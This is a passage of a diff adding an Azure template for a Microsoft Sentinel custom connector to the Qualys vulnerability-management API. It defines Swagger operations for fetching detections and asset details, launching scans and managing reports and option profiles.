"[[variables('operationId-VMScanOperations')]", + "operationId-OptionProfileOperations": "OptionProfileOperations", + "_operationId-OptionProfileOperations": "[[variables('operationId-OptionProfileOperations')]", + "operationId-ListScannerAppliances": "ListScannerAppliances", + "_operationId-ListScannerAppliances": "[[variables('operationId-ListScannerAppliances')]", + "operationId-ScanReportTemplateOperations": "ScanReportTemplateOperations", + "_operationId-ScanReportTemplateOperations": "[[variables('operationId-ScanReportTemplateOperations')]", + "operationId-DynamicSearchListOperations": "DynamicSearchListOperations", + "_operationId-DynamicSearchListOperations": "[[variables('operationId-DynamicSearchListOperations')]", + "operationId-SearchAssetByCriteria": "SearchAssetByCriteria", + "_operationId-SearchAssetByCriteria": "[[variables('operationId-SearchAssetByCriteria')]", + 
"operationId-AssetCountByCriteria": "AssetCountByCriteria", + "_operationId-AssetCountByCriteria": "[[variables('operationId-AssetCountByCriteria')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "playbookContentId1": "QualysCustomConnector", + "playbookId1": "[[resourceId('Microsoft.Web/customApis', parameters('Connector Name'))]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/customApis", + "apiVersion": "2016-06-01", + "name": "[[parameters('Connector Name')]", + "location": "[[variables('workspace-location-inline')]", + "properties": { + "connectionParameters": { + "Username": { + "type": "securestring" + }, + "Password": { + "type": "securestring" + } + }, + "backendService": { + "serviceUrl": "[[parameters('Service EndPoint')]" + }, + "brandColor": "#FFFFFF", + "capabilities": "[variables('TemplateEmptyArray')]", + "description": "Qualys VM is a cloud-based service that provides users immediate global visibility into IT inventory vulnerabilities and helps continuously monitor latest Internet threats.", + "displayName": "[[parameters('Connector Name')]", + "iconUri": "data:image/png;base64,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", + "swagger": { + "swagger": "2.0", + "info": { + "version": "1.0.0", + "title": "QualysCustomConnector", + "description": "Qualys VM is a cloud-based service that provides users immediate global visibility into IT inventory vulnerabilities and helps continuously monitor latest Internet threats." 
+ }, + "host": "[[replace(replace(parameters('Service Endpoint'),'https://',''),'http://','')]", + "basePath": "/", + "schemes": [ + "https" + ], + "consumes": "[variables('TemplateEmptyArray')]", + "produces": [ + "application/json" + ], + "paths": { + "/qps/rest/portal/version": { + "get": { + "summary": "Get Portal Details", + "description": "It fetches the Qualys Portal Component Versions.", + "operationId": "[[variables('_operationId-GetPortalDetails')]", + "parameters": [ + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "x-ms-summary": "X-Requested-With Header", + "description": "Mandatory Header Required by Qualys API", + "x-ms-visibility": "internal" + }, + { + "name": "Accept", + "in": "header", + "required": true, + "type": "string", + "default": "application/json", + "x-ms-summary": "Accept Header", + "description": "Header to get result in JSON Format", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Vary\"": { + "description": "\"Vary\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-Xss-protection\"": { + "description": "\"X-Xss-protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"Set-Cookie\"": { + "description": "\"Set-Cookie\"", + "type": "string" + }, + 
"\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + } + } + }, + "/api/2.0/fo/asset/host/vm/detection/": { + "post": { + "summary": "Get Detections By IP", + "description": "Get Vulnerability Details for an IP", + "operationId": "[[variables('_operationId-GetDetectionsByIP')]", + "parameters": [ + { + "name": "ips", + "in": "query", + "required": true, + "type": "string", + "description": "IP Address to Fetch Vulnerability Details", + "x-ms-summary": "IP Address" + }, + { + "name": "action", + "in": "query", + "required": true, + "type": "string", + "default": "list", + "description": "To fetch the Scan Results", + "x-ms-summary": "Action", + "x-ms-visibility": "internal" + }, + { + "name": "truncation_limit", + "in": "query", + "required": false, + "type": "integer", + "default": 100, + "description": "Truncate the result to provided limit", + "x-ms-summary": "Truncation Limit", + "x-ms-visibility": "advanced" + }, + { + "name": "output_format", + "in": "query", + "required": true, + "type": "string", + "default": "XML", + "x-ms-summary": "Output Format", + "description": "Scan Result Output Format", + "x-ms-visibility": "internal" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "x-ms-summary": "X-Requested-With Header", + "description": "Mandatory Header Required by Qualys API", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": 
"\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/asset/host/": { + "post": { + "summary": "Get Asset Details By IP", + "description": "Get Details of an Asset", + "operationId": "[[variables('_operationId-GetAssetDetailsByIP')]", + "parameters": [ + { + "name": "ips", + "in": "query", + "required": true, + "type": "string", + "description": "IP Address to Fetch Asset Details", + "x-ms-summary": "IP Address", + "x-ms-visibility": "important" + }, + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "x-ms-summary": "Action", + "x-ms-visibility": "internal", + "description": "To fetch Asset Details" + }, + { + 
"name": "details", + "default": "All", + "in": "query", + "type": "string", + "required": true, + "x-ms-summary": "Details", + "x-ms-visibility": "advanced", + "description": "Flag to Fetch Amount of Details", + "enum": [ + "All", + "Basic", + "None" + ] + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, 
+ "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/asset/ip/": { + "post": { + "summary": "Add IP For Scanning", + "description": "Add a New IP For Continuous Scanning", + "operationId": "[[variables('_operationId-AddIPForScanning')]", + "parameters": [ + { + "name": "ips", + "in": "query", + "required": true, + "type": "string", + "description": "IP Address to Add For Vulnerability Scanning", + "x-ms-summary": "IP Address", + "x-ms-visibility": "important" + }, + { + "name": "action", + "default": "add", + "in": "query", + "type": "string", + "required": true, + "x-ms-summary": "Action", + "description": "Default action to Add a New IP for Scanning", + "x-ms-visibility": "internal" + }, + { + "name": "enable_vm", + "default": 1, + "in": "query", + "type": "string", + "required": true, + "x-ms-visibility": "internal", + "description": "Flag to enable VM Scanning", + "x-ms-summary": "Enable VM" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": 
"\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/report/": { + "post": { + "summary": "Report Operations", + "description": "List, Launch, Fetch and Delete Scan Reports", + "operationId": "[[variables('_operationId-ReportOperations')]", + "parameters": [ + { + "name": "action", + "in": "query", + "required": true, + "type": "string", + "x-ms-visibility": "important", + "enum": [ + "list", + "launch", + "fetch", + "delete" + ], + "default": "list", + "x-ms-summary": "Action", + "description": "Choose Action According to Operation" + }, + { + "name": "id", + "in": "query", + "required": false, + "type": "integer", + "x-ms-visibility": "advanced", + "description": "Mandatory for List, Delete and Fetch Actions", + "x-ms-summary": "Report ID" + }, + { + "name": 
"template_id", + "in": "query", + "required": false, + "type": "integer", + "description": "Mandatory for Launch Action", + "x-ms-summary": "Report Template ID", + "x-ms-visibility": "advanced" + }, + { + "name": "report_type", + "in": "query", + "required": false, + "type": "string", + "x-ms-summary": "Report Type", + "description": "Mandatory for Launch Action", + "enum": [ + "Scan" + ] + }, + { + "name": "report_title", + "in": "query", + "required": false, + "type": "string", + "description": "Mandatory for Launch Action", + "x-ms-summary": "Report Title", + "x-ms-visibility": "advanced" + }, + { + "name": "output_format", + "in": "query", + "required": false, + "type": "string", + "x-ms-visibility": "advanced", + "description": "Mandatory for Launch Action", + "enum": [ + "pdf", + "html", + "mht", + "xml", + "csv", + "docx" + ], + "x-ms-summary": "Output Format" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "x-ms-summary": "X-Requested-With Header", + "description": "Mandatory Header Required by Qualys API", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "body": { + "type": "string", + "description": "body" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": 
"\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/scan/": { + "post": { + "summary": "VM Scan Operations", + "description": "List, Launch and Fetch Scan", + "operationId": "[[variables('_operationId-VMScanOperations')]", + "parameters": [ + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "x-ms-summary": "Action", + "x-ms-visibility": "important", + "enum": [ + "list", + "launch", + "fetch" + ], + "description": "Choose Action According to Operation" + }, + { + "name": "ip", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Launch Action", + "x-ms-summary": "IP Addresses", + "x-ms-visibility": "advanced" + }, + { + "name": "scan_ref", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for List and Fetch Action", + "x-ms-summary": "Scan Ref", + "x-ms-visibility": "advanced" + }, + { + "name": "launched_after_datetime", + "in": "query", + "type": "string", + "required": false, + "description": "Get the Scans Launched After DateTime", + "x-ms-summary": "Launched After DateTime", + "x-ms-visibility": "advanced" + }, + { + 
"name": "scan_title", + "in": "query", + "type": "string", + "required": false, + "x-ms-visibility": "advanced", + "description": "Mandatory For Lauch Action", + "x-ms-summary": "Scan Title" + }, + { + "name": "option_id", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Launch Action", + "x-ms-summary": "Option Profile ID", + "x-ms-visibility": "advanced" + }, + { + "name": "iscanner_name", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Launch Action", + "x-ms-summary": "Scanner Name", + "x-ms-visibility": "advanced" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "default": { + "description": "default" + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/subscription/option_profile/vm/": { + "post": { + "summary": "Option Profile Operations", + "description": "List, Create and Delete Option Profile", + "operationId": "[[variables('_operationId-OptionProfileOperations')]", + "parameters": [ + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "description": "Choose Action According to Operation", + "x-ms-summary": "Action", + "enum": [ + "list", + "create", + "delete" + ], + "x-ms-visibility": "important" + }, + { + "name": "id", + "in": "query", + "required": false, + "type": "integer", + "x-ms-visibility": "advanced", + "description": "Mandatory for List and Delete Actions", + "x-ms-summary": "Option Profile ID" + }, + { + "name": "title", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Create Action", + "x-ms-summary": "Profile Title", + "x-ms-visibility": "advanced" + }, + { + "name": "scan_tcp_ports", + "in": "query", + "type": "string", 
+ "required": false, + "enum": [ + "none", + "full", + "standard", + "light" + ], + "description": "Mandatory for Create Action", + "x-ms-visibility": "advanced", + "x-ms-summary": "Scan TCP Ports" + }, + { + "name": "scan_tcp_ports_additional", + "in": "query", + "type": "string", + "required": false, + "description": "Additional Ports for Scanning", + "x-ms-visibility": "advanced", + "x-ms-summary": "Additional TCP Ports" + }, + { + "name": "scan_udp_ports", + "in": "query", + "type": "string", + "required": false, + "enum": [ + "none", + "full", + "standard", + "light" + ], + "description": "Mandatory for Create Action", + "x-ms-summary": "Scan UDP Ports", + "x-ms-visibility": "advanced" + }, + { + "name": "scan_udp_ports_additional", + "default": "139,445", + "in": "query", + "type": "string", + "required": false, + "description": "Additional Ports for Scanning", + "x-ms-summary": "Additional UDP Ports", + "x-ms-visibility": "advanced" + }, + { + "name": "vulnerability_detection", + "default": "complete", + "in": "query", + "type": "string", + "required": false, + "enum": [ + "complete", + "custom" + ], + "x-ms-visibility": "advanced", + "x-ms-summary": "Vulnerability Detection", + "description": "Mandatory for Create Action" + }, + { + "name": "basic_information_gathering", + "in": "query", + "type": "string", + "required": false, + "x-ms-visibility": "advanced", + "enum": [ + "all", + "register", + "netblockonly", + "none" + ], + "description": "Mandatory for Create Action", + "x-ms-summary": "Information Gathering" + }, + { + "name": "map_tcp_ports_additional", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Create Action", + "x-ms-summary": "Map TCP Ports", + "x-ms-visibility": "advanced", + "default": 1, + "enum": [ + 0, + 1 + ] + }, + { + "name": "map_udp_ports_additional", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Create Action", + "x-ms-summary": "Map UDP Ports", + 
"x-ms-visibility": "advanced", + "default": 1, + "enum": [ + 0, + 1 + ] + }, + { + "name": "custom_search_list_ids", + "in": "query", + "required": false, + "type": "integer", + "x-ms-visibility": "advanced", + "description": "Mandatory If Vulnerability Detection is Custom", + "x-ms-summary": "Search List ID" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "default": { + "description": "default" + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/appliance/": { + "get": { + "summary": "List Scanner Appliances", + "description": "List All the Available Scanners", + "operationId": "[[variables('_operationId-ListScannerAppliances')]", + "parameters": [ + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "x-ms-visibility": "internal", + "description": "Appliance API Action", + "x-ms-summary": "Action" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "default": { + "description": "default" + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/report/template/scan/": { + "post": { + "summary": "Scan Report Template Operations", + "description": "Create and Delete Scan Report Template", + "operationId": "[[variables('_operationId-ScanReportTemplateOperations')]", + "parameters": [ + { + "name": "action", + "default": "create", + "in": "query", + "type": "string", + "required": true, + "enum": [ + "create", + "delete" + ], + "description": "Scan Report Template Actions", + "x-ms-summary": "Action" + }, + { + "name": 
"report_format", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory Action for Create Action", + "x-ms-summary": "Report Format", + "x-ms-visibility": "advanced", + "enum": [ + "xml" + ] + }, + { + "name": "template_id", + "in": "query", + "required": false, + "type": "integer", + "x-ms-visibility": "advanced", + "description": "Mandatory for Delete Action", + "x-ms-summary": "Scan Report Template ID" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + }, + { + "name": "Content-Type", + "in": "header", + "required": true, + "type": "string", + "default": "text/xml", + "description": "Content-Type", + "x-ms-visibility": "internal", + "x-ms-summary": "Content-Type" + }, + { + "name": "body", + "in": "body", + "schema": { + "type": "string", + "x-ms-visibility": "advanced", + "description": "Update IP and Port Details in the XML Schema", + "title": "Scan Report Template Schema", + "format": "binary", + "default": " \t \t\t<INFO key=\"title\"> \t\t\t<![CDATA[SentinelScanReport]]> \t\t</INFO> \t \t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t \t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t \t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t 
\t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t \t \t\t \t\t\t \t\t \t " + }, + "required": false, + "x-ms-visibility": "advanced" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "body": { + "type": "string", + "description": "body" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + }, + "400": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "body": { + 
"type": "string", + "description": "body" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/qid/search_list/dynamic/": { + "post": { + "summary": "Dynamic Search List Operations", + "description": "List, Create and Delete Dynamic Search Lists", + "operationId": "[[variables('_operationId-DynamicSearchListOperations')]", + "parameters": [ + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "enum": [ + "list", + "create", + "delete" + ], + 
"description": "Dynamic Search List Actions", + "x-ms-summary": "Action", + "x-ms-visibility": "important" + }, + { + "name": "id", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Delete Action", + "x-ms-visibility": "advanced", + "x-ms-summary": "Search List ID" + }, + { + "name": "show_qids", + "in": "query", + "type": "string", + "required": false, + "enum": [ + 0, + 1 + ], + "description": "Flag to hide/show QIDs", + "x-ms-summary": "Show QID Flag" + }, + { + "name": "cve_ids", + "in": "query", + "type": "string", + "required": false, + "description": "CVE ID List - Mandatory for Create Action", + "x-ms-summary": "CVE IDs", + "x-ms-visibility": "important" + }, + { + "name": "title", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Create Action", + "x-ms-summary": "Search List Title", + "x-ms-visibility": "advanced" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "default": { + "description": "default" + } + }, + "x-ms-visibility": "important" + } + }, + "/qps/rest/2.0/search/am/hostasset": { + "post": { + "summary": "Search Asset By Criteria", + "description": "Get All Assets for Given Criteria", + "operationId": "[[variables('_operationId-SearchAssetByCriteria')]", + "parameters": [ + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + }, + { + "name": "Content-Type", + "in": "header", + "required": true, + "type": "string", + "default": "text/xml", + "description": "Content-Type", + "x-ms-summary": "Content-Type", + "x-ms-visibility": 
"internal" + }, + { + "name": "Accept", + "in": "header", + "required": true, + "type": "string", + "default": "application/json", + "description": "Accept", + "x-ms-summary": "Accept", + "x-ms-visibility": "internal" + }, + { + "name": "filter-xml", + "in": "body", + "schema": { + "type": "string", + "description": "Filter Criteria XML", + "title": "filter-criteria", + "default": " \t \t\t100 \t >\" operator=\"EQUALS\">Search Value \t\t \t\t \t\t \t\t \t\t ", + "x-ms-visibility": "advanced" + }, + "required": true + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Vary\"": { + "description": "\"Vary\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-Xss-protection\"": { + "description": "\"X-Xss-protection\"", + "type": "string" 